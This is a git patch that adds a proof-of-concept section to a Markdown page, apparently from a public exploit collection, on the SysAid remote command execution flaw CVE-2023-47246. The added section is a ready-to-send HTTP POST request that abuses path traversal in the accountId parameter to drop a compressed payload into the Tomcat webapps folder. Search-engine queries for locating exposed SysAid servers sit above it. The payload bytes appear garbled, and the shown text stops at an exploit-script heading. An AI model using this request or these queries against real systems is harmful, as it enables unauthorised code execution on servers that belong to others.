From 13b5cb8f90e4c0f661c347c21a6a060ccb415c99 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 26 Dec 2023 19:52:59 +0800 Subject: [PATCH] =?UTF-8?q?Update=20SysAid=E8=BF=9C=E7=A8=8B=E5=91=BD?= =?UTF-8?q?=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E=EF=BC=88CVE-2023-?= =?UTF-8?q?47246=EF=BC=89.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- SysAid远程命令执行漏洞(CVE-2023-47246).md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/SysAid远程命令执行漏洞(CVE-2023-47246).md b/SysAid远程命令执行漏洞(CVE-2023-47246).md index 2570264..7374ce5 100644 --- a/SysAid远程命令执行漏洞(CVE-2023-47246).md +++ b/SysAid远程命令执行漏洞(CVE-2023-47246).md @@ -10,6 +10,24 @@ shodan:http.favicon.hash:1540720428 zoomeye:app:"SysAid On-Prem Software" hunter.how:favicon_hash="5f30870725d650d7377a134c74f41cfd" ``` + +## poc +``` +POST /userentry?accountId=/../../../tomcat/webapps/UIHM3/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 87 + +xœðffa``à`H­*ç©«¿Áä± +``` +![fb5ab4bdde18a3c8f92a3c0d5d2b23c9](https://github.com/wy876/POC/assets/139549762/f0e899f9-0d0f-4bda-9b1b-8d6f3151d290) + +![3dad5ed7f4a321562ad6c74ee9a9edf1](https://github.com/wy876/POC/assets/139549762/1b81f98e-2599-4622-8c24-c2543a543544) + ## Exp脚本 ```python